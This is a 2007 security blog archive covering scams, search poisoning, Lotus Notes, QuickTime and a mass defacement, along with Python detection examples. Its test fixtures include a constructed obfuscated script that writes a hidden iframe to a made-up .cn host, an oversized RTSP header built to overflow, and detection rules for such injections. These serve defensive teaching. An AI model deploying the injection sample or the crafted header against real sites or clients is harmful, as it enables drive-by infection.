Sharing Security Developments, and Best Practices for corporate and home users
November 2007 - Posts
-
Minyanville is a neat site that offers stock market and investment tips. These six tips are excellent for avoiding the scam artists who try to take advantage of the holiday season.
Holiday Safety Tips - Don't Fall Prey to Holiday Scams http://www.minyanville.com/articles/index/a/14897
QUOTE: The holidays bring good cheer, mistletoe – and scam artists. Holiday scammers play on your trusting nature, desire for a bargain and “urgent need” to update your financial information in their continuing quest to separate you from your money. Keep an eye out for these holiday scams:
1. Avoid E-Card greetings
2. Phony Sign-Up Tables at the mall or other public places offering charge cards
3. Emails requesting "Account information needed"
4. Emails, phone calls, or regular mail claiming "You are the winner"
5. Emails or regular mail claiming that "You are approved for credit cards"
6. Other telemarketing scams
SUMMARY: Just remember what your mother taught you: If it’s too good to be true, it’s a scam. Keep that in mind and no crook will spoil your holiday.
-
This advice is excellent for staying safe while shopping online during the holidays.
QUOTE:
5 Ways To Increase Safety While Shopping Online
1. Shop from Reliable Retailers. It's wise to do business with companies you already know and trust. If the retailer is unfamiliar, look up information on the company with the Better Business Bureau or the Office of the State Attorney General in the state where the seller is located.
2. Use a Credit Card, Not a Debit Card Online. Credit cards limit your liability for unauthorized charges to $50. You're not assured this protection with a debit card.
3. Ask about Single Use Credit Cards. Some credit card companies use a new technology that allows them to issue a single use credit card number for online purchases. With this number, you avoid having to use your real credit card number online, so security isn't jeopardized.
4. Avoid Buying On Public Computers. A hacker or thief can easily put a keylogger on a public computer that allows him or her to know everything you've typed — including your credit card numbers and passwords. Stay away from public access computers when shopping!
5. Don't Save Your Credit Card Numbers Online. Many reputable sites give you the option to save credit card numbers online to make future purchases easy. However, if the company's database is ever successfully hacked, your information could be exposed. It's safer to re-enter your numbers with each transaction.
Webroot Safe Holiday Shopping Guide - (PDF format, 16 pages, 1.8MB) http://www.webroot.com/pdf/Webroot_HolidayShopping_USA_1107.pdf
-
I may have spoken too soon, as a new batch of .cn sites is starting to show up, according to Sunbelt.
Internet Search poisoning - 2nd wave could be on the way?
Sunbelt is reporting newly registered .cn (China) domains being seeded into Google search results, and the same could show up in other search engines. The sites are not launching exploit attacks yet, but this could change.
What to avoid: unusual sites with random letter/number combinations, numerical IP addresses, and sites ending in the .cn domain when they appear in Internet search results.
Sunbelt: HEADS UP: More Google poisoning on the way? http://sunbeltblog.blogspot.com/2007/11/heads-up-more-google-poisoning-on-way.html
QUOTE:
Google has removed the sites responsible for the recent massive Google poisoning attack. However, we’re seeing indications that another attack may be on the way. We have seen another spate of websites freshly registered, using the similar .cn domains. There seem to be two different groups here. Right now, we’re not seeing either site serve exploits, as we saw in the last attack. However, this could change.
-
Some updates are noted below on this very serious threat: malicious web sites surfacing in Internet search results (e.g., Google). Numerous malicious pages have been created so that they appear prominently on the first few pages of results; the malware gang appears to be keyed in on Google's site-ranking methodology.
Below is some excellent advice from Sandi on what to avoid:
http://msmvps.com/blogs/spywaresucks/archive/2007/11/27/1359221.aspx
QUOTE: Take a close look at the URLs for the malware links; they are all random collections of letters and numbers, and they're all Chinese domains. Users of Google (and other web search engines) need to pay close attention to the links that are being offered, and avoid anything that just doesn't look right, and certainly avoid 'nonsense' domains like those in the Sunbelt screenshots
Below is the latest update from Sunbelt on this threat:
http://sunbeltblog.blogspot.com/2007/11/malware-redirects-aftermath_27.html
QUOTE: Sunbelt Software has uncovered tens of thousands of individual pages that have been meticulously created with the goal of obtaining high search engine ranking. Just about any search term you can think of can be found in these pages.
Sunbelt is classifying this particular threat as follows in CounterSpy:
SCAM.IWin Malware Family http://research.sunbelt-software.com/threatdisplay.aspx?name=Scam.Iwin&threatid=43561
QUOTE: Scam.Iwin is created by a browser exploit for the purpose of transmitting false clicks to internet URLs. The victim's computer is used to generate income for the attacker in a pay-per-click affiliate program by transmitting false clicks to the attacker's URLs without the user's knowledge. The infected Scam.Iwin files are not ordinarily visible to the user. The files are executed and run silently in the background when the user starts the computer and/or connects to the internet. Scam.Iwin is thought to be related to CoolWebSearch.
Original post from yesterday:
http://myitforum.com/cs2/blogs/hwaldron/archive/2007/11/27/internet-searches-massive-number-of-redirects-to-malicious-sites.aspx
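The advice in this post and in the .cn heads-up above (random letter/number hosts, bare IP addresses, .cn domains) can be turned into a quick triage check. The following Python is an added example, my own code rather than anything from Sunbelt or Sandi; the sample URLs are constructed and the thresholds inside looks_random() are my assumptions, chosen to separate brand names from generated labels. Treat a hit as a reason to look closer, not as a blocklist.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample results; none of these hosts are taken from the reports above.
SAMPLE_RESULTS = [
    "http://www.cisco.com/en/US/products/hw/routers/index.html",
    "http://x7k2q9.cn/linksys-wrt54g-firmware.html",
    "http://192.0.2.45/download/dd-wrt.php",
    "http://a1b2c3d4e5f6.example/search?q=router",
    "http://support.microsoft.com/kb/123456",
]


def looks_random(label: str) -> bool:
    """Heuristic for machine-generated DNS labels (thresholds are assumptions).

    Signals: many letter/digit transitions, letters mixed with digits but
    few vowels, or a long label with no vowels at all.
    """
    if len(label) < 6:
        return False
    letters = [c for c in label if c.isalpha()]
    digits = [c for c in label if c.isdigit()]
    transitions = sum(
        1 for a, b in zip(label, label[1:]) if a.isdigit() != b.isdigit()
    )
    vowel_ratio = (
        sum(c in "aeiou" for c in letters) / len(letters) if letters else 0.0
    )
    mixed = bool(letters) and bool(digits)
    return (
        transitions >= 3
        or (mixed and vowel_ratio < 0.25)
        or (len(letters) >= 6 and vowel_ratio == 0.0)
    )


def classify_result(url: str) -> list:
    """Return the reasons a search-result URL looks suspicious ([] = no signal)."""
    reasons = []
    host = (urlsplit(url).hostname or "").lower()
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address")
        return reasons  # digits-only labels carry no further signal
    except ValueError:
        pass
    labels = host.split(".")
    if labels[-1] == "cn":
        reasons.append("domain ends in .cn")
    for label in labels[:-1]:
        if looks_random(label):
            reasons.append(f"random-looking label '{label}'")
    return reasons


def triage(urls) -> dict:
    """Map each flagged URL to its reasons; clean URLs are left out."""
    flagged = {}
    for url in urls:
        reasons = classify_result(url)
        if reasons:
            flagged[url] = reasons
    return flagged


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_RESULTS).items():
        print(url, "->", "; ".join(reasons))
```

The label heuristic deliberately ignores the top-level domain and the path: the attackers' pages use ordinary keyword-rich file names, so the host is where the signal is.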
-
If the "123" extension type (Lotus 1-2-3 spreadsheet format) is not being used, it might be valuable to add it to the email attachment blocking list used by Lotus Notes shops. There are workarounds for versions 5 and 7, and IBM may have a version 6 solution by the end of the month.
Lotus Notes - vulnerable to attack through "123" extension http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9049439 http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21285600
QUOTE: Sebastián Muñiz from the CORE IMPACT Exploit Writers Team (EWT) at Core Security Technologies contacted IBM® Lotus® to report a potential keyview buffer overflow vulnerability in Lotus Notes® when viewing a Lotus 1-2-3 (.123 extension) file attachment. In specific situations it was found that the possibility exists to execute arbitrary code.
To successfully exploit this vulnerability, an attacker would need to send a specially crafted Lotus 1-2-3 file attachment to users, and the users would then have to double-click and View the attachment.
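The attachment-blocking idea above, worked through as an added gateway-side example in Python (my own code, not an IBM or Lotus Notes configuration): it walks a MIME message, takes the declared filename of every attachment part, and blocks the message when the final extension is on a list that now includes .123. The blocklist entries other than .123 and the sample message are assumptions.

```python
import email
import os
from email import policy

# Final extensions to block at the mail gateway. ".123" is the addition this
# post suggests; the rest is an assumed starting list, not a vendor-published one.
BLOCKED_EXTENSIONS = {".123", ".exe", ".scr", ".pif", ".vbs", ".bat", ".cmd"}


def normalise_name(filename: str) -> str:
    """Lower-case and drop trailing dots/spaces before looking at the extension.

    Some clients silently strip trailing '.' and ' ' before choosing a viewer,
    so 'Budget.123.' would otherwise pass an exact-match check and still open
    as a Lotus 1-2-3 file on the desktop.
    """
    return filename.strip().rstrip(". ").lower()


def is_blocked(filename: str) -> bool:
    """True when the file's final extension is on the blocklist."""
    return os.path.splitext(normalise_name(filename))[1] in BLOCKED_EXTENSIONS


def attachment_names(msg) -> list:
    """Declared filenames of all non-container parts of a parsed message."""
    names = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        # Content-Disposition filename=, falling back to Content-Type name=
        name = part.get_filename()
        if name:
            names.append(name)
    return names


def check_message(raw: str):
    """Return ('block' | 'allow', [offending filenames]) for a raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    offenders = [n for n in attachment_names(msg) if is_blocked(n)]
    return ("block" if offenders else "allow", offenders)


# Constructed sample message; the attachment body is filler, not a real 1-2-3 file.
SAMPLE_MESSAGE = """\
From: sender@example.org
To: user@example.com
Subject: Q4 budget
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

Please review the attached worksheet.
--XX
Content-Type: application/octet-stream; name="Budget.123"
Content-Disposition: attachment; filename="Budget.123"
Content-Transfer-Encoding: base64

QUJDREVG
--XX--
"""

if __name__ == "__main__":
    print(check_message(SAMPLE_MESSAGE))  # ('block', ['Budget.123'])
```

This only inspects declared names. A .123 file inside a ZIP, or one renamed to another extension that the recipient later renames back, is not caught; that needs content inspection, which the example does not attempt.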
-
There are a number of new features and improvements that the next version of SQL Server will provide when it is released in 2008.
MVP Brad McGehee discusses the ins and outs of SQL Server 2008 http://searchwinit.techtarget.com/originalContent/0,289142,sid1_gci1283694,00.html
QUOTE: With the release of the recent SQL Server 2008 Community Technology Preview, and a final product expected in the second half of 2008, SQL Server MVP Brad McGehee shared some of his insights with SearchWinIT.com on the product's complexity, what's new for IT managers and DBAs and where the database still needs a little work.
-
Sunbelt posted this cautionary note today: folks should be careful when selecting links from an Internet search. One theory is that the seeding comes from malicious links posted in blogs, forums or other community sources. Given the dangers of email and hostile URLs, it's important to stay as up-to-date as possible on security patches and AV protection, and to apply old-fashioned common sense.
BREAKING: Massive amounts of malware redirects in searches http://sunbeltblog.blogspot.com/2007...f-malware.html
QUOTE: We’re seeing a large amount of seeded search results which lead to malware sites. These are using common, innocent terms — one researcher landed on a malware site through searching for alternate firmware for a router.
-
QuickTime, and iTunes which embeds it, can be attacked through a malformed RTSP Content-Type header returned by a malicious streaming server, and exploit code is already public. Users should be careful with email attachments and web site visitation, and watch for a forthcoming QuickTime update, as Apple will most likely patch this serious vulnerability promptly.
Apple QuickTime and iTunes Critical Vulnerabilities http://secunia.com/advisories/27755/ http://isc.sans.org/diary.html?storyid=3690 http://www.frsirt.com/english/advisories/2007/3984 http://www.kb.cert.org/vuls/id/659761 http://www.f-secure.com/weblog/archives/00001325.html
QUOTE: Apple QuickTime contains a stack buffer overflow vulnerability in the way QuickTime handles the RTSP Content-Type header. This vulnerability may be exploited by convincing a user to connect to a specially crafted RTSP stream. Note that QuickTime is a component of Apple iTunes, therefore iTunes installations are also affected by this vulnerability. We are aware of publicly available exploit code for this vulnerability.
ISC UPDATE-1: We have received a report that exploits are now working for Vista, XP, IE6, IE7, and Safari 3.0 on Windows. Keep in mind that other attack vectors may be vulnerable as well.
ISC UPDATE-2: Firefox has been reported as an exploit vector as well.
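As an added example (my own code, not Apple's or the ISC's), the following Python parses an RTSP response the way a client-side proxy or IDS check would and flags a Content-Type, or any other header, whose value is abnormally long or contains non-printable bytes, which is the shape of the crafted stream the advisory describes. Both responses are constructed; the 255-byte ceiling is my assumption, since legitimate values such as application/sdp are a few dozen bytes at most.

```python
import re

MAX_HEADER_VALUE = 255  # assumption: far above any legitimate RTSP header value

# RTSP/1.x <3-digit status> <printable reason phrase>
STATUS_LINE = re.compile(rb"^RTSP/1\.\d \d{3} [ -~]*$")


def parse_rtsp_response(data: bytes):
    """Split an RTSP response into (status line, {lower-case name: raw value bytes}).

    Raises ValueError on anything that is not a well-formed response head; a
    defensive client treats that as hostile rather than trying to recover.
    """
    head, sep, _body = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers sequence")
    lines = head.split(b"\r\n")
    if not STATUS_LINE.match(lines[0]):
        raise ValueError("malformed status line")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        name = name.strip()
        # header names are ASCII token characters, which excludes ':'
        if not colon or not re.fullmatch(rb"[!-9;-~]+", name):
            raise ValueError("malformed header line")
        headers[name.decode("ascii").lower()] = value.strip()
    return lines[0].decode("ascii"), headers


def suspicious_response(data: bytes) -> list:
    """Reasons a server's response looks like an attack on the client ([] if none)."""
    try:
        _status, headers = parse_rtsp_response(data)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    reasons = []
    for name, value in headers.items():
        if len(value) > MAX_HEADER_VALUE:
            reasons.append(f"{name} value is {len(value)} bytes")
        if any(b < 0x20 or b > 0x7E for b in value):
            reasons.append(f"{name} value contains non-printable bytes")
    return reasons


# Constructed responses: a normal DESCRIBE reply and one carrying an oversized
# Content-Type of the kind the advisory describes.
BENIGN = (
    b"RTSP/1.0 200 OK\r\n"
    b"CSeq: 2\r\n"
    b"Content-Type: application/sdp\r\n"
    b"Content-Length: 0\r\n\r\n"
)
CRAFTED = (
    b"RTSP/1.0 200 OK\r\n"
    b"CSeq: 2\r\n"
    b"Content-Type: " + b"A" * 1000 + b"\r\n\r\n"
)

if __name__ == "__main__":
    print("benign :", suspicious_response(BENIGN))
    print("crafted:", suspicious_response(CRAFTED))
```

The length check applies to every header, not only Content-Type: once a client parses a value into a fixed-size buffer, any header can be the one that overflows, and a bound on all of them costs nothing.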
-
While these 10 tips shared in an Information Week article require some work, they will help ensure safety both at home and on the road:
Wireless Security - 10 tips to secure your laptop http://www.informationweek.com/news/showArticle.jhtml?articleID=203102748
QUOTE: Whether you're home or on the road, these security steps will help protect you and your computer from wireless scoundrels:
1. Make sure you are connecting to the right network.
2. Secure your connection.
3. Use frequency settings that are different from others.
4. Find the strongest signals.
5. Turn off your wireless network adapter when you are on the plane.
6. Use whole disk encryption on your laptop.
7. If you are having trouble connecting to a network, try rebooting Windows.
8. Make sure you have a firewall and it is running.
9. Pick your hotspot connection and your supplier carefully.
10. Finally, don't blithely accept SSL certificates and SSH public keys.
-
The following resources are excellent in defining the requirements related to SOX 404 IT controls:
SOX 404 PowerPoint presentation by EKS&H (11 slides, 820KB); selecting this link will download the PPT file http://www.hftpcoloradofrontrange.org/dwnlds/HFTP_SOX_Presentation.ppt
SOX 404 PDF detailed requirements by KPMG (48 pages, 880kb) http://www.kpmg.com/aci/docs/PCAOB_S-O_404_v9.pdf
ISACA - Free PDF version of COBIT 4.0 http://www.sarbanes-oxley-forum.com/modules.php?name=Forums&file=viewtopic&t=1920
QUOTE: The ISACA is now offering free PDF versions of COBIT 4.0 (plus the older 3.0 standards as well). You'll need to follow the registration process through, and once you become a member you can log in and obtain a PDF copy. There are also additional benefits and documents if you become a paid member of ISACA. Many external audit firms use COBIT standards to ensure SOX 404 requirements are met. This free benefit can help folks get started with key IT standards they may need to implement to safeguard their financial systems.
-
Please beware of any spam emails that contain Geocities links, as this is the latest Storm worm tactic.
Storm Worm - now uses Geocities based links http://blog.trendmicro.com/storm-brews-over-geocities/
QUOTE: Storm is back, and according to TrendLabs researchers, the infamous malware family has added yet another twist to their tactics. “It looks like Google will have its hands full in the next couple of days,” Senior Threat Researcher Ivan Macalintal says. “There are limited reports that the Storm worm may be spamming emails with links to a Geocities site. This was seen in the monitoring of the spam templates being sent via Storm communications to its botnets.”
This newest chapter in the Storm saga proves that the creators of the said malware are still very much active. Its use of a popular free server like Geocities and disguising itself as a plug-in may mean that they are still looking for more systems to infect.
-
This article from Government Computer News provides a good high level summary of key features, which include:
- Firewall on by default
- BitLocker capabilities
- Network Access Protection (NAP)
- Internet Information Server 7 (IIS7)
- Remote management improvements
- Read-only Domain Controllers
- Enhanced authentication in Active Directory environments
GCN Article: Windows Server 2008 provides improved security http://www.gcn.com/online/vol1_no1/45401-1.html
QUOTE: Microsoft Corp. unveiled a significantly more secure server operating system in showcasing its new Windows Server 2008 last week at the Microsoft Windows Server Technical Summit held in Redmond, Wash.
-
Scammers continue to craft highly convincing schemes. For example, they can use disposable phones and even spoof the caller-ID display number so the call appears to come from a bank or credit union. They then ask for highly confidential information (e.g., SSN, bank account, credit card numbers), and anything revealed can be used for identity theft or direct fraud.
The specific attack documented by the Internet Storm Center is an email claiming the recipient's credit card or bank account has been locked due to highly unusual activity, with a phone number to call. If individuals panic and call, the operator can appear legitimate because the victims themselves supply the sensitive account details. Later they may discover they have been defrauded, and it can take weeks or months to straighten these matters out.
If you receive phone numbers in suspicious messages and are unsure, contact the bank or firm directly using the publicly listed numbers in the phone directory or on its official website instead.
Social Engineering Techniques - Don't call phone numbers in spam email http://isc.sans.org/diary.html?storyid=3639
QUOTE: From an awareness point of view to your customers and users:
* not only to teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
* but to also tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)
Below is also an excellent site for checking toll-free numbers, including calls where the caller-ID information is listed as Private or Unavailable.
Site listing Suspect Toll Free Phone Numbers http://800notes.com/
News related Toll Free calls http://800notes.com/articles/NewsList.aspx
Best Practices - Toll Free Calls http://800notes.com/articles/ArticleList.aspx
-
This is shared in the interest of showing that you can never be too careful, even with a brand new hard drive from the factory.
Seagate - A few Maxtor 3200 hard drives may contain a virus http://www.infoworld.com/article/07/11/12/Seagate-ships-virus-laden-hard-drives_1.html
QUOTE: Seagate is warning that a "small number" of its Maxtor Basics Personal Storage 3200 hard drives recently shipped with the Virus.Win32.AutoRun.ah virus, malicious software that "searches for passwords for online games and sends them to a server located in China," according to a note posted on the Seagate Web site. Only drives purchased since August 2007 are affected, Seagate said. The hard drive maker is blaming an unnamed subcontractor, located in China, for the problem.
-
Below is an interesting commentary related to the SOX regulatory requirements which are imposed on all publicly traded companies in the United States. While I personally feel there have been many benefits, SOX has been costly. Some of the requirements have also been difficult at times (e.g., SOX 404), which has exacerbated the overall cost factors. Hopefully, the forthcoming changes will help alleviate some of these costs.
MARKETWATCH: Sarbanes-Oxley turns 5 amid mixed results http://www.marketwatch.com/news/story/sarbanes-oxley-turns-five-proponents-see/story.aspx?guid=%7B864E903B%2D7DED%2D4544%2DAD41%2D9DD5BFC5173E%7D
QUOTE: SAN FRANCISCO (MarketWatch) -- Congress enacted Sarbanes-Oxley in 2002 in the wake of the spectacular collapse of Enron Corp. in an accounting scandal. The collapse led to the demise of auditor Arthur Andersen, one of the "Big Five" accounting industry giants.
Soon after Enron imploded, telecom giant WorldCom blew up in its own accounting scandal. It was with WorldCom in mind that lawmakers added the now infamous section 404 to SOX, which requires that chief executives and chief financial officers personally certify that financial statements are complete and accurate, under penalty of jail time. The kicker has been the responsibility of auditors to attest to management's assertions, which critics contend led to additional cost burdens.
A survey released this year by the Financial Executives Research Foundation revealed that the average 2006 cost for SOX compliance was $1.2 million at publicly-traded companies for auditor attest statements alone. If this estimate, which did not factor in money spent on internal preparation, was to include all filers at more than 15,000 public concerns, it would equal about $180 billion in 2006 costs.
-
Web Site Defacements using obfuscated script attacks affect 52,000 pages. This web-server-based attack has impacted many sites recently. While these are most likely less mainstream sites, folks should be cautious with email links or web site visitation.
http://isc.sans.org/diary.html?storyid=3621
QUOTE: Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40,000 pages across the internet, covering around 150 domains which we so far know of. This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
http://isc.sans.org/diary.html?storyid=3625
UPDATE: The good news so far is that the executable being downloaded seems to be detected by most AV products. The sad news is that when I checked the other day the number of infected sites was about 30K and now about 52,000 sites.
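The injected pattern the ISC describes, an obfuscated script that writes hidden iframes pointing at exploit pages, is something a site owner can scan their own pages for. The following Python is an added example (mine, not the ISC's or a vendor's): it walks a page with the standard library HTML parser, flags zero-size or hidden iframes and inline scripts that lean on unescape()/eval() with a long run of escape sequences, then decodes the unescape('...') payload once and rescans what it would write. The two sample pages, the .cn host in the payload and the 20-escape threshold are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

ESCAPE_RE = re.compile(r"%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}")
DECODER_RE = re.compile(r"\b(?:unescape|eval|String\.fromCharCode)\s*\(")
MIN_ESCAPES = 20  # assumption: hand-written page scripts rarely carry this many


def looks_obfuscated(js: str) -> bool:
    """Packed-payload heuristic: a decoder call plus a long run of escapes."""
    return bool(DECODER_RE.search(js)) and len(ESCAPE_RE.findall(js)) >= MIN_ESCAPES


class InjectionScanner(HTMLParser):
    """Collects drive-by indicators: hidden iframes and obfuscated inline scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(f"hidden iframe -> {a.get('src')}")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script or not looks_obfuscated(data):
            return
        self.findings.append("obfuscated inline script")
        # Decode the most common wrapper, unescape('...'), and scan what it
        # would document.write(); one level only, to avoid chasing nested layers.
        m = re.search(r"unescape\(\s*'([^']*)'\s*\)", data)
        if m:
            self.findings.extend("decoded: " + f for f in scan_html(unquote(m.group(1))))


def scan_html(html: str) -> list:
    """Return the indicator list for one page ([] means nothing was flagged)."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples. The injected page mimics the structure of the mass
# defacement: an ordinary page with an appended packed script.
_PAYLOAD = "".join(
    f"%{ord(c):02X}"
    for c in '<iframe src="http://x7k2q9.cn/in.php" width=0 height=0></iframe>'
)
CLEAN_PAGE = (
    '<html><body><p>Hello</p><script src="/js/site.js"></script>'
    '<iframe src="/widgets/weather" width="300" height="200"></iframe></body></html>'
)
INJECTED_PAGE = (
    "<html><body><p>Hello</p>"
    f"<script>document.write(unescape('{_PAYLOAD}'))</script></body></html>"
)

if __name__ == "__main__":
    print("clean   :", scan_html(CLEAN_PAGE))
    print("injected:", scan_html(INJECTED_PAGE))
```

Run over a site's document root this gives a first cut at the affected-page count the ISC reports; a 1x1 iframe for a legitimate tracking pixel will also trip the hidden-iframe rule, so review the src of each hit rather than acting on the count alone.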
-
Paul Laudanski, founder of Castlecops, reports that an estimated $150 million in losses have been prevented through the work of the PIRT team in "frying phish" and even taking down malicious web sites. While Castlecops promotes awareness like many security firms, they go the extra mile in reporting malware to authorities and actively working to combat hostile attacks (e.g., phishing, malware, and spam).
These efforts are greatly appreciated in making email and the Internet a little safer through the efforts of all the teams participating there. I've also been a member of Castlecops for a couple of years and assist in sharing new security developments and best practices in the forums.
Castlecops PIRT - Prevented over $150 Million in Phishing attack losses http://www.castlecops.com/a6843-PIRT_has_prevented_over_150_Million_US_in_Stolen_Monies.html http://www.castlecops.com/article-topic-66.html
QUOTE: Since May 2006, our Phishing Incident Reporting and Termination team has directly prevented more than $80 million in credit card losses, and indirectly an additional $75 million by working with our partners. We've shut down not only phish sites, but drops all the while preserving evidence for law enforcement. And we need your help by donating your time as handlers to keep on investigating phish crimes so we can continue to prevent even greater numbers. PIRT right now is receiving around 47,000 unique phish submissions per month. Our PIRT handlers are doing amazing work and trailblazing new roads in phish investigations and intelligence.
Some of the key services provided by Castlecops include:
PIRT - Phishing Incident Reporting and Termination http://www.castlecops.com/pirt
MIRT - Malware Incident Reporting and Termination http://www.castlecops.com/mirt
SIRT - Spam Incident Reporting and Termination http://www.castlecops.com/sirt
Castlecops - Free Technical and security forums http://www.castlecops.com/forums.html
Castlecops - Advanced Malware Removal (HiJackThis analysis) http://www.castlecops.com/HijackThis.html
-
In testing internal corporate security in the past, I've also seen that longer passwords require more time to crack than shorter ones. Every character added to the password length better protects you. Using LophtCrack, CAIN, and other password testing tools I had also run experiments on password lengths from 3 through 8 characters. While the 3 character passwords would be found almost instantly, times increased exponentially for each subsequent test as the password grew in size.
Both complexity and length are important. The point of the blog post is that a short complex password may not offer sufficient protection even though in human terms it may seem more difficult to guess. Password strength comes down to the size of the search space an attacker must cover, and every added character multiplies that space by the size of the character set, so length makes the bigger difference. It might be good to ensure all passwords are eight or more characters.
http://www.avertlabs.com/research/blog/index.php/2007/11/02/password-policy-length-vs-complexity/
QUOTE: The bottom line:
* In general, password length trumps password complexity. This applies to both cracking and rainbow table attacks.
* Given the opportunity, users will choose the simplest passwords, such as ‘Password1!’
* Make sure you account for human tendencies that include usernames in passwords, too many repeating characters, passwords based on dictionary words, capitalization of the first letter, symbols & digits at the end, etc.
* Enforce your password policy
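To make the quoted points concrete, here is an added example in Python (my own code, not Avert Labs'): a policy check that enforces the eight-character floor from this post, rejects passwords containing the username, long runs of one character, and dictionary words dressed up like 'Password1!', plus a keyspace calculation showing why a twelve-character lowercase password out-sizes an eight-character one drawn from all four classes. The word list, the run limit of three and the 33-symbol count are assumptions.

```python
import math
import re

MIN_LENGTH = 8    # the post's floor: eight or more characters
MAX_RUN = 3       # assumption: longest acceptable run of one character
SYMBOLS = 33      # assumption: printable ASCII symbols outside letters/digits

# Tiny constructed word list standing in for a real dictionary file.
DICTIONARY = {"password", "welcome", "summer", "company", "letmein", "secret"}


def base_word(pw: str) -> str:
    """Undo the usual dressing (capital first letter, digits/symbols at either
    end) so 'Password1!' and '!!Summer2007' compare as 'password' and 'summer'."""
    core = re.sub(r"^[^A-Za-z]+|[^A-Za-z]+$", "", pw)
    return core.lower()


def keyspace_bits(pw: str) -> float:
    """log2 of the search space for a password of this length drawn uniformly
    from the character classes it uses. Real user choices are far smaller,
    which is why the policy checks below exist."""
    size = 0
    if re.search(r"[a-z]", pw):
        size += 26
    if re.search(r"[A-Z]", pw):
        size += 26
    if re.search(r"[0-9]", pw):
        size += 10
    if re.search(r"[^A-Za-z0-9]", pw):
        size += SYMBOLS
    return len(pw) * math.log2(size) if size else 0.0


def check_password(username: str, pw: str) -> list:
    """Return policy violations for pw ([] means it passes)."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if username and username.lower() in pw.lower():
        problems.append("contains the username")
    if re.search(r"(.)\1{%d,}" % MAX_RUN, pw):
        problems.append(f"run of more than {MAX_RUN} identical characters")
    word = base_word(pw)
    if word in DICTIONARY:
        problems.append(f"dictionary word '{word}' with predictable dressing")
    return problems


if __name__ == "__main__":
    for pw in ("Password1!", "Jsmith2007", "aaaa1234", "purple-tractor-in-the-rain"):
        print(f"{pw:28} {keyspace_bits(pw):6.1f} bits  {check_password('jsmith', pw)}")
```

The keyspace figure is the ceiling a brute-force or rainbow-table attacker faces; the policy checks address the floor, which is where 'Password1!' actually lives. Both matter, but only the length term grows without bound.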